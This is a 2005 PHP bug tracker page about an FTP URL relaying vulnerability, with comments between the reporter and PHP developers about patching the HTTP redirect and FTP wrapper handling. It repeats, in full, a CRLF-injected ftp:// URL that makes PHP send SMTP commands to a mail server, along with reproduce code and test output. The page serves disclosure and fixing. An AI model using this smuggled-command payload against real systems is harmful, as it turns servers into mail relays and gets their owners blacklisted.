php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #32936 FTP URL relaying vulnerability
Submitted: 2005-05-04 00:33 UTC Modified: 2005-05-07 02:12 UTC
From: herbert dot groot dot jebbink at gmail dot com Assigned: pollita (profile)
Status: Closed Package: FTP related
PHP Version: 5.0.4 OS: Linux
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: herbert dot groot dot jebbink at gmail dot com
New email:
PHP Version: OS:

 

 [2005-05-04 00:33 UTC] herbert dot groot dot jebbink at gmail dot com 
Description:
------------
See http://dsbl.org/relay-methods#FTPURL for more details.

A exploit can be found at http://dividedsky.net/gfx/badges

This URL gives the next result.

HTTP/1.x 302 Found
Date: Tue, 03 May 2005 21:43:41 GMT
Server: Apache/2.0.53 (Debian GNU/Linux) PHP/4.3.10-10
Content-Location: badges.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/4.3.10-10
Location:
ftp://foo%0D%0AMAIL%20FROM%3A<>%0D%0ARCPT%20TO%3A<listme%40listme.dsbl.org>%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AVv%2FcqZoUAlAyMb9O2R+Xu0YSwQNRN5DL%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1


Reproduce code:
---------------
<?php

  // DO NOT RUN THIS CODE

  // YOUR SERVER WILL BE LISTED ON DSBL.ORG

  // RESULTING IN POSSIBLE REJECTS OF YOUR EMAILS

  $check = getimagesize('http://dividedsky.net/gfx/badges') ;

?>

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2005-05-05 04:42 UTC] pollita@php.net 
Interresting...
 [2005-05-05 12:18 UTC] herbert dot groot dot jebbink at gmail dot com 
"Interresting" was not the word that I used when I found out that my server was blacklisted as a spam machine and my emails where rejected by many mailservers. 

My bot that is written in PHP was trapped in the given exploit.
 [2005-05-06 04:24 UTC] iliaa@php.net 
This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.
 
Thank you for the report, and for helping us make PHP better.
 [2005-05-06 22:24 UTC] herbert dot groot dot jebbink at gmail dot com 
Thanks for the patch, however, IMHO the patch should not be applied in the HTTP wrapper to check a redirect but in the FTP wrapper. That way it will also work in the below situation, where PHP is still tricked to send a mail.

  $ftp = 'ftp://foo%0D%0AMAIL%20FROM%3A&amp;lt;&amp;gt;%0D%0ARCPT%20TO%3A&amp;lt;listme%40listme.dsbl.org&amp;gt;%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AvIHU%2FRSZHzlaqPF5ZUxHqE5nj79uL4sg%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/';

  $check = file_get_contents($ftp);
 [2005-05-07 00:28 UTC] iliaa@php.net 
the patch was applied in 2 places, the HTTP redirect handling and FTP wrapper.
 [2005-05-07 02:12 UTC] herbert dot groot dot jebbink at gmail dot com 
I did test both ways before sending my previous comment, PHP stops now a 302 redirect, but the direct FTP way still results in sending a email. (there is a warning "failed to open stream: Operation now in progress" but the email is send)

linux:/home/hgj # cat test.php
<?php

  $http = 'http://dividedsky.net/gfx/badges' ;
  $ftp  = 'ftp://foo%0D%0AMAIL%20FROM%3A&amp;lt;&amp;gt;%0D%0ARCPT%20TO%3A&amp;lt;listme%40listme.dsbl.org&amp;gt;%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AvIHU%2FRSZHzlaqPF5ZUxHqE5nj79uL4sg%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/';

  $check = getimagesize($http);
  $check = file_get_contents($ftp);

?>

linux:/home/hgj # /usr/local/bin/php --version
PHP 5.0.5-dev (cgi) (built: May  6 2005 20:58:59)
Copyright (c) 1997-2004 The PHP Group
Zend Engine v2.0.4-dev, Copyright (c) 1998-2004 Zend Technologies

linux:/home/hgj # /usr/local/bin/php test.php
Content-type: text/html
X-Powered-By: PHP/5.0.5-dev

<br />
<b>Warning</b>:  getimagesize(http://dividedsky.net/gfx/badges) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Invalid redirect url! ftp://foo%0D%0AMAIL%20FROM%3A&amp;lt;&amp;gt;%0D%0ARCPT%20TO%3A&amp;lt;listme%40listme.dsbl.org&amp;gt;%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AkeiEBtjqp2q0dV13uGVlTPl8xWpobZPF%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/ in <b>/home/hgj/test.php</b> on line <b>6</b><br />
<br />
<b>Warning</b>:  file_get_contents(ftp://...@mx.listme.dsbl.org:25/) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: Operation now in progress in <b>/home/hgj/test.php</b> on line <b>7</b><br />

After a minute or so you can see the result at the dsbl.org website :-) In my case it it is the below url:

http://dsbl.org/listing?82.197.205.88
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Thu Nov 21 12:01:29 2024 UTC